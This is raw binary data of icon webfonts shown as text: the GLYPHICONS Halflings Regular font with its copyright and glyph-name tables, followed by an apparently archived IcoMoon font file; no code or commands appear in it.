�[���֛[[���֛�@����

��%2".4>#"#"276&+4&��֛[[���֛[[���
�

�
&
�
��[���֛[[���֛�
����
����2".4>%&277>7.'.'"'&65.'6.'&767>'&>7>7&72267.'4>&'?6.'.'>72>��՛\\���՛\\�d+:
=?1	""/?9
#hu!$
0E.(,3)(
	 	
*!A7,8
!?*

�\���՛\\���՛	'"r"v	G
	.&*
r$> #1
	

% 
*
	'"	
$g2(	%
��67'"/&47&6����PM<�;��+oX"O�\e��~Y�+"��n+We�`��#'7;!2#!"&=46#3!2#!"&=46!!!2#!"&=46!!d�);;)�);;���);;)�);;���);;)�);;��,�;)d);;)d);dd�;)d);;)d);dd�;)d);;)d);dddL�!2#!"&46!���|;����**�D�����d��%32!2!5#!463!54635#!"&=��);,);��;),;)��;)�);�;)d;)�pdd�);d);ddd�D�);;)���+AW!2"/&546)2/"/&4?'&6#!"&54676276#!"&?'&4?622,^�j�^5,^�j�^�/j�^��^��^��^�j�^�j�^,��^�j�^�&j�^,^��^��^�j��#;CK2".4>"2>4&$2"&4$2#"'"&546?&542"&4$2"&4��ݟ__���ݠ^^���oo��oo�--  - L-  73H3)z	��-  - -  - �_���ݠ^^���ݟWo��oo�� -!!-  -!
�$33$ 1~� -  -  -  -��Z��[%676&'&#"3276'.#"&477>32#"&'&6767632'."�[v_"A0?! ��-
	Y7J3$$
��)G"#A.,=
#(wn�kV8@Fv"0D�G([kPHNg8B�*��[eb�2!��5(7>B3$$'��)M"#!7)/c#*xn�fL@9N�D�H7!$�W]�B�$&dX�DD>.54>"".#"2>767>54&�0{xuX6Cy��>>��xC8Zvxy#!?2-*!')-?"CoA23:+1!
"3)@+)?j�DH-Sv@9y��UU��y9@vS-H-&65&&56&oM8J41<*.0(@	)*D*2Om9��w�.2&/7'/&477"/&4?��B�B8"._��{�i�BBi
	�BB��B�B�BB7._���B�B^*k"5._��{�j�B�B�Fi	�B�B��BB�B�B77/_�����2#!"&54>!"264��d:;)��);<f>X��V==V=�.2�G);;)�3-��D��=V==V��	"/''!'&462�*$������3�,#*���*#�������4�$*'	�2@K#.'#5&'.'3'.54>75>4.�&ER<,�
3'@"<P7(��d�W(�WJ.BN0 2Uh:**&	h)1"37�N,?iB$.,��
-<d>��MOW(kVMbO/9X6FpH*M�6&+��	 4C4%df��J2#4.#"3#>36327#".'>7>'#53&'.>761T�^�'<;%T)��-6"b �"S5268 jt&'V7	0$ݦ
-$a�P�N(?",9J0*	d2�>2
"�"�

7�Gd/9+DAL!X����32"/&6;3+##"&?62���*�����Ȗ�*,�����|������%#5##!32"/&6;3353!57#5!�ddd,����*����dc�����,�dd�|���d���d��d����!%32"/&6;33!57#5!#5##!35���*���X�����,ddd,�d,�����d��d�Pdd�d����L�32"/&6;3##53#5#!35���*���Xdd�dd�,�d,�����d�Pd�d����L�32"/&6;3#5#!35##53���*����d�,�ddd�,����d�d����d����32"/&6;3#53!5!!5!!5!���*������d��,d�p�d��,������������32"/&6;3!5!!5!!5!#53���*��� ��d�p�d��,d��,��������LL!2#!"&546!"3!2654&^������p���g�);;)�);;L���p��������;)�);;)�);LL+!2#!"&546!"3!2654&&546^������p���d�);;)�);;�o��L���p��������;)�);;)�);��$��LL+!2#!"&546!"3!2654&!2"/&6^������p���g�);;)�);;���$�L���p��������;)�);;)�);���LL+!2#!"&546!"3!2654&#!"&?62^������p���g�);;)�);;����p�$L���p��������;)�);;)�);��L5!2#!"&=463!2654&#!"&=46&=#"&=46;546&������p�);;)�>�D����L���p��d;)�);d��&��
���
���#%2"+'&7>?!"'&766763	�,����			P''��
K
�	�	
�S#���	�nnV/��L5!2#!"3!2#!"&546&=#"&=46;546^��>);;)��p����D����Ld;)�);d�������&��
���
��1!2/"/&47'&6#"3!26=7#!"&5463!��m��)�8m��);;)�);Ȼ��p����,��pm���)8m��;)�);;)��֥��������#2".4>"2>4&2"&4��ٝ]]���ٝ]]����qq���qq�{�rr�r�]���ٝ]]���ٝGq���qq���sr�rr�L�#3232"'&6;46!2!54635���
��'
��
	������gd����V�^�|��d22L�#	++"&=#"&7>!2!54635Gz
�"��'�����gd��M ��!����d22LK"	62"'&4?62!2!54635�q����������gd�q���#�����d22L�	#'762'&476#"&?'7!2!54635��*M�M���К�=���gd��M�L*����Л�:��d22L�#'/'7'&6"/&4?!2!54635^WЛԛ��L*�M�����gd���КԚ��PM�*M�X��d22����%	!	����q��3�g�q�����dL�+!#"&546;!3#53L��D���d�dd���p���,��E��/'&"!#"&546;!3#53"/&4?6262L��_		��Ȗ��d�dd�j�\�jO)��_		��p���,���j�[�jO)
�>'.!#"&546;!3#53"/"/&4?'&4?62762Lg�%�������d�dd�F��F)��)F��F)��)��g����p���,���F)��)F��F)��)F����/!"!#"&546;!3#533232"/&6;546L������d�dd�d��*������p���,���������/'&"!#"&546;!3#53++"&=#"&?62L�*���n���d�dd���d��*�p����p���,���������L	!2!546#!"&5!52L�P���d�L�����&����}��-1;&=!5!546#"&=46;#5376!!/&4#5;2+����p��/22�dd�����p��ddd33��*��Ȗ��d�����Ȗ�*y�dd��Q%6+"&5.546%2+"&5.54>323<>3234>^%�"%��
�"

d	d	1t���5gD�
�>?1)�A�..@�

��^

��^
d�L3"!5265!3!52>54&/5!"!4&#5�"2�pK�K�p"2�K�KL8
��88
%��v%
88
x88
%�v�%
8LL $(4!2#5'!7!!2#!"&546!55%!5#!!'!73�wi���pdw�%,);;)��);;),��p��,���d��d��i��bb�d�;)�);;)�);d���������f�dd���&767>".'.7�.�wf��w3��
.1LOefx;JwF2��1v��ev�/� 5Cc;J�|sU@�L#A2/.=& &=>2#!"&=46754>���ud?,		����
1;ft�pR&m��m&L!(("

�""��""�
'$+ ��

2��2��2/2
!��
'!'3353353!2+!7#"&46!2!546L������������J��L�P���������*dd*��22d�L	#"!4&#"!4&!46;2�d);,;gd);,;���;)d);L;)��);��;)�D�);���);;)���L%)!2#!"&546!#3!535#!#33��|��|�D|���������,�d��ddL�|�|��|�|��D��d��dd,d��d�d��,���L%)!2#!"&546!#5##3353#33��|��|�D|����dddddd�d��ddL�|�|��|�|��D��������d��d�d��,���L#!2#!"&546!#3!!#3!!��|��|�D|�������,����,L�|�|��|�|��D���d�d��d����L!2#!"&546!-
��|��|�D|������,���L�|�|��|�|��D������,���L )!2#!"&546!!!#";32654&#��|��|�D|���d�D�d�&96)���)69&L�|�|��|�|��D����dVAAT,��TAAV���L%)!2#!"&546!#3!535#!##53#53��|��|�D|���������,�dd��ddL�|�|��|�|��D��d��dd,��d�d���L#'!2#!"&546!3!3##5335#53��|��|�D|����D��dXdd��d,ddL�|�|��|�|��D��p��d����d���L"&!2#!"&546!#575#5!##53#53��|��|�D|�����d��,�dd��ddL�|�|��|�|��D��p�2Ȗd��d�d		��%2".4>"2>4&!!!'57!��۞^^���۞^^����qq���qql��,��dd,�^���۞^^���۞Lq���qq�����dd�d		��'+2".4>"2>4&#'##!35��۞^^���۞^^����qq���qql2ddd�d,���^���۞^^���۞Lq���qq����d2d2dd�ddd���A 62632+54&#!"#"&5467&54>3232"/&6;46�n�,,.x��x����PpVAb�z�
�

�
&
�
�Awa���sOEkd�b��
����
���A32632&"#"&5467&54>++"&5#"&76762�n�,+.y�xZ��
%
��	OqVAb���
�
�
�

�Awa�xc�h��sOEkd�c�����

�dLm%5!33	33!#"!54&#������Ԫ����2�dd,,M�����d22y7�/2#"'2!54635#"&547.546324&546X^�Y{;2	iJ7-��-7Ji/9iJ��qY�Z=gJi�22�iJX5Jit�'��*BJb{"&'&7>2"3276767>/&'&"327>7>/&'&&"267"327>76&/&"327>76&/&�oOOoS���SoOOoS���=y�"
$GF`
	Pu
"Q9	�c�cc�cVQ:	Pu
"�GF`
	y�"
$�o���oSWWSo++oSWW"�y	`FG#
�uP
	:Q#�cc�cc:Q#uP
	$`FG#
"�y	d��"!#5!!463!#53'353!"&5+�,�����
?,�d��Ԣd��u
�
� �����
�������
���
d��	!!	463!#5##5#7!"&=)+5�,����
?,�>�d�Ԫ��
|
� ��^��G
���|���d
77
P��#3!#732!!34>3!!��dd�Ԣ��!,���d!s���,� �d,��+$d���$+�p�p�LL293232#!"&=46;54652#!"'74633!265#535�d2��2s);;)�����;)X>,>X�����L2dd2��;)��);�FD);�>XX��Ԣd�d�L6=3232#!"&=46;54652#3#!"&54633!265#535�d2��2s);��!��);;)X>,>X����L2dd2��;)���$+;) );�>XX��Ԣd����	#!"&762#";2676&35�} ,�, }@D�:#6#:�����&77&P'�L��.�dd	LL/?O_o�32+"&=4632+"&=46!32+"&=4632+"&=46!32+"&=46!32+"&=4632+"&=46!32+"&=46!32+"&=46��

�

�

�
��

�
��

�
��

�
��

�
��

�
��

�
��

�
L
�

�
��
�

�

�

�
��
�

�

�

�

�

�
��
�

�

�

�

�

�
�)33#!2!&/&63!5#5353!2+!7#"&46!2!546�dd^>1B)(��()B1>^dd�>���J�
�L�P��dO7�S33S�7Od�d�|*dd*��22�+52#4!!2!'&63!&54!2+!%5#"&46!2!5460P9�<:H)"��Z�"
)H����J��L�P;))�%&!��!&��*����*��22��$.2"&432!65463!2+!7#"&46!2!546
�jj�j�."+'��'+#���
��J��L�P�j�jj���9:LkkL:9�r*dd*��22�,62"&5477'632!65463!2+!7#"&46!2!546X/[3o�o"�o�"."+'��'+#���
��J��L�Pk�6NooN>Q�o��
9:LkkL:9�r*dd*��22�",!!.54>7!2+!7#"&46!2!546X,��%??M��<=Bm�J���
��J��L�P���9fQ?HS�TT�vK�~*dd*��22��)2!546754!2#3#3#3#!"&546/R;.6�p6.d�6\������uS�pSuu;)N\6226\N)�G6.dddddSuuS�Sud��LL/3!2#!"&546!2#!"/!"&4?!"&=46!'���|�

���
%
X��W
&
��
�dDdL���D
2
�
%
XX
%
�
2
ddd�L#-7!2#4&+"#4&+"#546!2!46+"&=!+"&=� Sud;)�);d;)�);du�);�P;�d�dLuS�);;));;)�Su�;)��,);�2222��
	!&4762	!2!546������  'Y��V/��� �|��UY�Y(�n��0U�22�!�/.#!"3!26=326!546;546;33232!�'�p'�q*}���20�/2�������22,��2��
"!#!5463!#5!#!"&5463!#5�,
����
w,��,
�v

w,� ��
O,T
�����

�
�����dGFV32676'&7>++"&?+"'+"&?&/.=46;67'&6;6#";26=4&��K�jIC


)V=>8'"d1*�)"dT,�|-o�tE�

�
GAk�I
! "%,=?W7|&�F@�Je5&2WO_e_
2

2
����~	$4<Rb%6%32!2&'&#!"&=46#";2654&'&"2647>?&/&6%?6'.'.��. ��+jCHf7�"	*:��>XX�P*� �@--@-�� -?0
!3P/|)�(	)f!%
=��&*
x�"6�2&�CX>�>X�83D�-@--@�ۂ
# �=I+E(	/�/}X&+	5!H	d9�Q`o322#+"&=#+"&=#"&=46;#"&=46;546;23546!2>574.#!2>574.#q�
Oh ..40:*"6-@#
�
d
�
�

KK

�
�
d�))��k))�
m!mJ.M-(2N-;]<*K

KK

K
�
X
�
K

KK
���
"�p�
"��),!2#!"&'.546"!7.#�Vz$�R��R�(z �}VG+�0� )IU!���zV�`3�BBWwvXZ�3�Vz�&--%��,(1#����32#!"&546+"&=ۖg�T)�>)T�H6�6�g�)TT)�g���66���33#!"&546+"&=�`��T)�>)T�H6�6���B)TT)�g���66�	%'5754&>?'	%5%����Nd��d/��\����^^���<�ǔ�Ȗ�

(A�b�����d�� 2"&4$2"&4$2"&4�|XX|X�|XX|X�|XX|X X|XX|XX|XX|XX|XX|��L2"&42"&42"&4�|XX|XX|XX|XX|XX|XLX|XX|��X|XX|��X|XX|ddLL/!2#!"&=46!2#!"&=46!2#!"&=46}�

�J

�

�J

�

�J
L
�

�
�p
�

�
�p
�

�
��/3!2#!"&546!"3!2654&!2#!"&546!5^��������);;)X);;����G�����������;)��);;)X);d��,d��dd�L;!2+32+32+32#!"&46;5#"&46;5#"&46;5#"&46��222222�222222L*�*�*�**�*�*�*,��
*.62"&%#462"&%#46"&=32�W??WW??��|�|���|���|�|���|��*(�C��BB�����|�||�|��԰|�||�|��Ӑ������B76+2+"47&"+".543#"&'&676/!'.6�E*
'?)��
T��0I'*L
#3�{�,#
n��
6F82 ��*<SC#

(#(��(#��%C#4.+!52>5#"#!#4.+3#525#"#5!�2&�2�p"�&2�D
d
�2d
�� ��dd	R ,�
�W
22�
�L� 05"'./#!5"&?!##!"&=463!2���E��	1;E%=
!'��y���,2 "
�#	22+.��"A2�V����dd��GJ!2#!"&546#"3!26=4&#"'&?!#"3!26=4&'"'&'#&#2L��FF
��&	7

?
99���g���LR� 
22��22$����#'!5!!2#!"&546)2#!"&546!��P�����pm��pG,Ld��|��p�d��,��#'!2#!"&546!2#!"&546!!5!2��pm��pG,�P���|���p�d��,��dd��'+!235463!23##!"&=##!"&546!2�d�dd�pd�p�,�����d���� ���,��'3#3!2#!"&546!!2#!"&546ddd���pG,����|�d�p�d��,��p�dL�'+32+!2#!"&5463!5#"&546;53!X����|^��d�,L�pd�p�d�d��,��'!#3!2#!"&546!!2#!"&546�dd�v��pG,����|�d�p�d��,��p�,0o�	#"&54632a��5���*A2�~	6'&4O�**�{�)�)�*2A~�!2"'&6d�)�*��*��*2,~o	#!"&762{�)�)�*a�**��(
5-5!5!��L��c��� �������d��1#3!35#5!34>;!5".5323!������,�P2&d2�"d&2���dd,dd� ��dd	& ,L�%1#4.+!52>5#"#!#3!35#5! 2&d2�p"d&2 ,�����,� ��dd	& ,��dd,dd�frJ32	+"'&476��
�0�
�
�)�
J�0�0	��	>f�J32+"&7	&6S�
��)

�
�0
J	�)�)	��f�Jr"'&=46	4	�)�)	��w
�
�)�

�
�0�f>J�	'	&=4762j�	�0�0	��)

�
�0
�
���=�:#463267>"&#""'./.>'&6�|��Vd&O"(P3G*+*3M,
:IG79_7&%*>7F1�
�|�|���5KmCKG\JBktl$#?hI7 ����!2+&5#"&546!5�X����,��p��	��ddd�L�!2%!#4675��'=�DX�Dd
d�Q,�[u�}�4�]ddMo�__<���vs��vs��Q������Q�����(���d���p���E���HE�d�{����������������	�d������������&�n����d��d��d�����d�������d��d���������d�����5�d������!���������������u����
����������������,�d���;�������������������I����]����������d����d������Q����E������J��������a�����������d��d9�'d�ddd����������������		���dy'ddd���d�����d��d�dd,��d,A22�>ff���****���NNNNNNNNNNNNNN�"~���Fn��2b��\�r� b�b�	6	�	�	�
(
L
�
�0��X
*
^
�h�(��T��*v�
8|�t�*�<��6`��R�.j����(h����6h��^�2��Dl���.v�b� F �!2!v!�"@"�"�##"#8#z#�#�$$0$^$�$�%4%`%�&&~&�'P'�'�(4(p(�)�)�*&*J*�+
+z,,h,�,�--�-�.(.f.�.�//F/~/�/�0>0�0�11`1�1�2$2^2�2�3"3>3h3�44`4�4�5,5�5�6>6|6�77N7�7�88B8�8�9
9J9�9�::l:�:�;�;�<<P<�<�=2=�>:>�>�?(?n?�?�@H@�@�AA~BB�B�CCBCvC�C�DD`D�D�EZE�FFtF�F�G6GvG�G�HH2HNHjH�H�II8I^I�I�JJ.JR�@.�	j	(|	�	L�	8�	x6	6�	�		�	$	$4	$X	�|	�0�	��www.glyphicons.comCopyright � 2014 by Jan Kovarik. All rights reserved.GLYPHICONS HalflingsRegular1.009;UKWN;GLYPHICONSHalflings-RegularGLYPHICONS Halflings RegularVersion 1.009;PS 001.009;hotconv 1.0.70;makeotf.lib2.5.58329GLYPHICONSHalflings-RegularJan KovarikJan Kovarikwww.glyphicons.comwww.glyphicons.comwww.glyphicons.comWebfont 1.0Wed Oct 29 06:36:07 2014Font Squirrel��2
�	

� !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

glyph1glyph2uni00A0uni2000uni2001uni2002uni2003uni2004uni2005uni2006uni2007uni2008uni2009uni200Auni202Funi205FEurouni20BDuni231Buni25FCuni2601uni26FAuni2709uni270FuniE001uniE002uniE003uniE005uniE006uniE007uniE008uniE009uniE010uniE011uniE012uniE013uniE014uniE015uniE016uniE017uniE018uniE019uniE020uniE021uniE022uniE023uniE024uniE025uniE026uniE027uniE028uniE029uniE030uniE031uniE032uniE033uniE034uniE035uniE036uniE037uniE038uniE039uniE040uniE041uniE042uniE043uniE044uniE045uniE046uniE047uniE048uniE049uniE050uniE051uniE052uniE053uniE054uniE055uniE056uniE057uniE058uniE059uniE060uniE062uniE063uniE064uniE065uniE066uniE067uniE068uniE069uniE070uniE071uniE072uniE073uniE074uniE075uniE076uniE077uniE078uniE079uniE080uniE081uniE082uniE083uniE084uniE085uniE086uniE087uniE088uniE089uniE090uniE091uniE092uniE093uniE094uniE095uniE096uniE097uniE101uniE102uniE103uniE104uniE105uniE106uniE107uniE108uniE109uniE110uniE111uniE112uniE113uniE114uniE115uniE116uniE117uniE118uniE119uniE120uniE121uniE122uniE123uniE124uniE125uniE126uniE127uniE128uniE129uniE130uniE131uniE132uniE133uniE134uniE135uniE136uniE137uniE138uniE139uniE140uniE141uniE142uniE143uniE144uniE145uniE146uniE148uniE149uniE150uniE151uniE152uniE153uniE154uniE155uniE156uniE157uniE158uniE159uniE160uniE161uniE162uniE163uniE164uniE165uniE166uniE167uniE168uniE169uniE170uniE171uniE172uniE173uniE174uniE175uniE176uniE177uniE178uniE179uniE180uniE181uniE182uniE183uniE184uniE185uniE186uniE187uniE188uniE189uniE190uniE191uniE192uniE193uniE194uniE195uniE197uniE198uniE199uniE200uniE201uniE202uniE203uniE204uniE205uniE206uniE209uniE210uniE211uniE212uniE213uniE214uniE215uniE216uniE218uniE219uniE221uniE223uniE224uniE225uniE226uniE227uniE230uniE231uniE232uniE233uniE234uniE235uniE236uniE237uniE238uniE239uniE240uniE241uniE242uniE243uniE244uniE245uniE246uniE247uniE248uniE249uniE250uniE251uniE252uniE253uniE254uniE255uniE256uniE257uniE258uniE259uniE260uniF8FFu1F511u1F6AATP�PK!��K�vvbizone/fonts/icomoon.ttfnu&1i��0OS/2e�`cmap�r�x\gaspxglyf_.��=|head�|�>�6hhea
�)?4$hmtx�{t�?X|locaP��Y��maxp��tT name�J	�tt�postu� �������3	@�6���@�@ @ �c�6���� �������� h��797979���%5EQ]!2654&#!"&5463!2326=4&#!"3!2654&#!"#!"&5463!232654&#"32654&#"0�		�@		�			�`$`���	��		`	��



�



@			�		�		��`������		�		��






��@�-1AK7265463!232654&#!""3!2654&#!!!"3!26=4&#!"&=!p			%�$	g		�		�����	6�5	"�`!�	��		�'$�	�	�@		�	�@��	&.5 	0"
����(8<LV7!326=!2654&#!"463!2#!"&57!2654&#!"!!"3!26=4&#!5463!200		0��	�		��	P		�		� @%	�	% �``�0		0��@�		�@		0	@		��	@���%0		.&B �� �/3?!2654&#!"463!2#!"&57!2654&#!"!!32654&#"0��@	�		�@	P@		��		 ��



@��`�		�`		p	�		� 	�@`


��`�/3?M!2654&#!"463!2#!"&57!2654&#!"!!32654&#"32654&+"0�			�	0�		�@		��`�



0�		�		@��`�		�`		p	�		�`	���`


				���&,>LZhv�!2650450&54&'8581.'*1&"#!"3#"&5%463!;#!"&5!2654&#!"!2654&#!"32654&+"!2654&#!"!2654&#!"0���@�̼� 	��	�`	��		�`		�		�`		�		�		�		�`		�		�`		@� �`���	�%�p						�								��				�				��@� &9GUcq������7!265<14&14&/.#0&#0"#!"3#"&5%463!;#!"&5!2654&#!"!2654&#!"32654&+"!2654&#!"!2654&#!"3;#!"&=4&#"3!265<14&14&/.#"4#0"+"3"&=32654&+"32654&+"32654&+"32654&+"0@������	�`	p�	��
p�		��		�		��		�		�		�		��		�		��		'��	��
		@��		�	���		�		�		�		�		�		�		�		@`���I�	�	���		 ��				�								��				�				`���		 		 `�		�	���				�				�				�				���AMS���!26=041>7326764/>54&'04150450&54&'8581.'*1&"#!"3#"&54632#"&5%463!;.#"!"3!!"3!!"3!2033267#!"&532654&+"!2654&#!"0��$5+��@gIIggIIg��̼� 	��),M��		1��		��		HN,)	�`	��		�		�		�`		@���N-7\P �`�IggIIgg���	�%0"		1		1		#�		�				�				����-O_iw���!2654&+";2#!"&546;2654&+"2654&+"3!2654&+";!!26=4&#!"'!#!"&5!2654&#!"7!2654&#!"!2654&#!"!2654&#!"0 �		����		��		@		�		@		0���@#	�`	#���`		��		`		��		`		��		`		��		@�		���		��`			�					� �@#�		�#����				�				�				�				��>�+/?CQ_m{������%2654&#"#"&54&#"!2654&#!"!!!26=4&#!"7!!!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!2654&#!"!"3!2654&!2654&#!"!021812654&#"#"&54&#!"!0!"&5�#					(�@		��		 ��		�		� �		@		��		@		��		@		��		@		��		@		��@		��		��		@		��@		��		A\L66L�]A�		�[6L #P		��	P		��  	 		��	 ��	�		�	�`�				`				`				`				`				 				@				 				�]AP��6LL6P��A]�

L6B	��`�'1?M[iw��2654&#!"326=46;#"&=4&#"3!2#!%4&#"32632654&+"732654&+"32654&+"32654&+"732654&+"32654&+"���		��		���0@				���		�		�		�		�		�		�		�		�		�		�		�		@�%		%�`		���0@		��		W				�				�				�				�				�				�� �-=KYgu���������!".#!"3!2673!2654&!"&5463!2%#!"&5463!2"32654&2654&#"!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&��

�

���H�P				��				'��		�		��		�		��		�		��		�		��		�		��		�		9��		�		��		�		��		�		��		�		��		�		��		�		�����@����	��		@	��	@		��	�				�								��				�				�								�								��				�				�				��@�-7GKYgu���"#!"&54&#"3!2654&!"3!26=4&!5463!22654&#!"3!!!2654&#!"!2654&#!"!2654&#!"32654&#"32654&#"32654&#"0		� 			�	'� 	 	�	�	�		�`		���0�		� 		�		� 		�		� 		��



�



�



�	��		�		���	@�		��		��			�	� �				�				�				�










	��@���������4&#"#!"&54&#"3!26";326=3326=3326=3326=32654&+532654&+54&#"#54&#"#54&#"#54&#"#";%#5##5#3#32!546;2654&+"3!26=4&+"#2654&#!"354&#"32626=4&#"@			� 			��P		0		�		�		�		0		00		0		�		�		�		0		0�� �����	�		�	 	�		�		��		P								`		��		`		��		p		pp		pp		pp		p		�		�		��		��		��		�		����������			�		�						0�		�				�		�	���� �+Y{"3!2654&#"#!"&54&%!"3!2654&&"?326?326=4&5.'"&+";?32676&/>=4&#"	�			��		���		@		�d�
���		�		y��
���		�`	�� 		��		 	`				���
���y		�		��qq
tS		St
���+7Gdx!2654&#!"463!2#!"&52654&#"72#"&546!2654&#!"75625762326?>3281!'.#81"'&!0��`	�		�`	p&&&&


�
�		� 		��|Z�@�Cp�-��@��`�		�`		@&&&&`



�	�		��	 ���ub}`�LI		j���� �+7Gat�7!2654&#!"463!2#!"&52654&#"72#"&546!2654&#!"75625762326?>32!'.#81"'&""3!2654&+";2#!"&=4&0@��	@		��	 &&&&


�=�		�@		��|:�`�#p�-�	@				��		@ ��P		��		�&&&&`



� 	`		��	 ���uB}@�m(		k����	@			��			����(ADR`n|���������#"3!2654&#46;#"&!+32&"3267%>54&'%#";2654&'32654&+"#";2654&#";2654&#";2654&#";2654&#";2654&32654&+"732654&+"32654&+"32654&+"32654&+"32654&+"#";2654&�@����������Y	 ����@		@		G@		@		G@		@		@		@		@		@		@		@		@		@		Y@		@		@		@		@		@		@		@		@		@		@		@		G@		@		��`��0��@��@��`���������D�				`				�				�				�				�				�				`				�				�				�				�				�				`				��@�H\����#"&=4&#!"+";2654&+"&5!32>54&'!+";2654&".54>32".#".#!546;26=463!2;226=4&+"326=46;2"32>54.".54>32��.A?��F:0�!//!�		�Aq�VV�qA�		�!//��O�i<<i�OO�i<<i�)L`o<<o`L���9(+5?2.'9��	�			�		w<hO--Oh<<hO--Oh<5]F((F]55]F((F]; BC >/!��!/		�%P+V�qAAq�V+P%�p		/!@!/��<i�OO�i<<i�OO�i<@3S;!!;S3�G -0 G�	  		 		 	�-Oh<<hO--Oh<<hO-��(F]55]F((F]55]F(��@�SWay��#54&+";2#4&#!"#546;2654&+"#";2654&+"&=!+";2654&!!463!2"!54&#"3!2654&732654&#"32654&#"P@		@	�	� 	�	@		@P�		�		�		����@��	�	��	�@			�		�



�



�p			p0		��p			p�@			pp			� ��0		��@	��		�			�






��@�7AKi"#!"&54&#"3!2654&!"3!3!26=!26=4&#!"&=!%!5463!2"326=463!2326=4&#0		� 			�	'� 	�`�	�<	��	���	�	��			`			�	�`		�		�`�	@�	pp	���		p �		�		�		�		�����;Nav"#!"&54&#"3!2654&26=4&#!"326=463!2!"32>=4&#".=463!2267265.#"'&�		��			`	�y	��			`		g��h��ts٩g^��qsѡ_	`	��.	1\1
	3�	��		�		���	�	``		`		`	@�!I>((>I!��<8''8<�		�0
	
����&��26=4&+'.3:7%7>/32"32#!"&=46;26=4&#!"&546;3:7%>'.0"#!"3!26=4&#"#!"&53!2#"3!26=4&32654&#"	V�/�+K
�		��	�0""�`	C�}�+55+�		�0"!���



�	5:��4	5	�		��	�"" �5+�@+5�		�"v
����


��@�+AW���"3!2654&#!"&54&!"#!"3!2654&3!232654&#!"%"3265463!2654&#!>764'&"4&#".'.7>7>'.!"3!3267>732653267>76&'.'!2654&#%>32>"'&47>70	@		��		�		�`		�	�)	�			�`	�			@		��s
$$#j#
		)r

$		S'�n		+	$$--
		)q
$		R'�		��
""
r&bNr&�	��			�		��			�	�		��

		��

			�a	%f%##				�Y=* 
*76	

%f%	��		
>* 
*75
	�

L-l��L-l����/@P`#>54&+"#>54&+"3!2654&+"#"&546;2#3"&546;2#+"&546;2@f�f� ��`p		�		�		�		�	�		�	p����``����\	`		��		�		�`	���		�		����CGWg2654&+54&#"!54&#"#";#";3265!326532654&+!!4&#!"3!26%463!2#!"&�		�		��		�		��		�		 		�		� �� `����@	�		��	`		�		��		�		��		��		��				 �� ����`�		�`		���%GT4&#!"3265463!2#!"3!26"3!265732654&#!";#!"&5463!�`			�		��		 �0�			�		��		�		���		 		�`			D���					��			��@�+AWgk#"326=46;2654&!#";2326=4&"+";26=4&!";2654&+"&=4&%26=4&+"373#�			�		��		�					�		�	��	�		�		�		�		����		�						�		��	�			�		�			�	�	�		�	�����BFLQ[e!2654&#!"463!2#!"&57:3%267>5764/&"013'#5%';62'0��`	�		�`	`@Cu�)x��e�"��7KN��I���$�@	T��W��l�@��`�		�`		A`Fu*�x����v!��
&M��K���@%�V	FQ��l��� �+7CO[gu���!"3!2654&#!"&5463!2"32654&"&54632"32654&"&54632"32654&"&54632'2654&#""326=4&"32654&2654&#"�`,,�,,�`��&&&&


�&&&&


��&&&&



								�				�				�,��,,�,�@�p&&&&`



�`&&&&`



&&&&`



�	 		��	�	`		`	`	�@		�	��	�		�@	����EU_"3267>767>54&#"'.'.#"&'.54&#%54&#!"3!26'!5463!20		#hhXVef#
		
%smORpu%
	P��	`	 ��	 	�	�bO_YY_O	�		�b_jUUj_�	P��		�			������47o�����4&#!"3!26554&#!"3!26=4.'>!#0&1'54&#"01#54>7>54&'.=!7!"3267>7>764'.#.'3!2654&#!"3"326=4&'"326=4&�
�~

�
!	��	(;CE:&	@	)<CE:&����D@.I�		�I*=ED@. *=EZ��P,'L�$?�<���

�~

A								�				�t		t;dP;<Pa:t		s;dP;<Pa����6Ld;c�		�d9`L85Lc<dd9`L8�1B	>+	�3!.��				�	 		 	`	 		 	
����2;?CGKPZd"#"3!2654&+54.4>32#54&#"#)54632#7!#7!#73#7#53!"&=!!5463!2�BuW20!//!�!//!02Wu��-Oh<<hO-`qOOq`���^BB^נ��R���R����ɠ��	��� @����2WuB`/!�@!//!�!/`BuW2��<hO--Oh<``OqqO``B^^B��������������PP����
Yd|�"32654&&"#!";32654&#"&'.'332654&#"&'.'323267>54&'46;#"&5.+"&#81"+!2>72654&#"�				@	$b��z�D#11#m/$`=		6U(`3 		(�z��c$��ll@&g��{�k0{��f%�p				�	� 		�	'F=*2$��#1n/$$		(a4		'
*>F
��{V�@�G=)�)=G��	V		��	��`�I"676&'.5>73267>54&'.'&4&#�k�j6Rrz(
0vhG8`�X	��u-Y�Y
KuR1`�� 	�3>5��f�zSQs�\;	13*�0		H��|@-84		
*0+��k�yK�	��/�
iv��2654&#!"3!"32676&'.'&67>;326=4&5>5323267>76&'.#.5!"3!26=4&#!5463!20		��		 ��OQ
+4631)
M60DXU		_cM06M)3476+QOPI^YOS@�@%	�	% �``�				 -K) C?52;?";��Q[7P		P	7[Q0;">?6:BB)K-��IuU44TuI0��%0		.&B ��n�o}!"3!23265..#!!2!0&'.54&#"30:1267>'.'>76&'.#!"3!23"#4&#"326���		`*		!
��P"k�E		&���	%-)

),&	��

.1''2-��				�	� 	"		�;��-��
			AB9
AKH			SR=
4HK���		� 		���Xr���833:7%23267201%>'.'&"?.%54&#"6&'&%676&/&"3267>54.#"2.54>4&#"326"&54632(\\ ��
���==��		��=
=���
�� ]R`O*Id99dI*O`R3X@%=QPOQ>%@X�T<<TT<<T�.BB..BB>^^�
0Y
O���
�VX

XV�
��O
Y��
�S��Y9dI**Id9W��T�%@X3I�yWYx�H3X@%�<TT<<TT4B..BB..B��`�z�4&#"#"3267>32#"&'.#";>54&'.54632326=>3232654&#"#"&'40154&+8#.5467>5:;23267>32#"&'.#"+.5467>54&#"#"&=>3232654&#"#"&'546;029>54&'.54632�MTJZ	
�8U)GH'V7�
G<;G
~4A

" 5XP0 (	
B3~	5~*+!	,4E(	!),~
	NTIZ	�)D	
' 4[\4 &	F'�
I;;F
C/NE8!"
M3w
	B>?P	�6S	*33*	I9�OMSM
s:L
"!8
@&t 	F:@<
�$>	
"!.OE8!"
	A(�
aNNR	
w*6
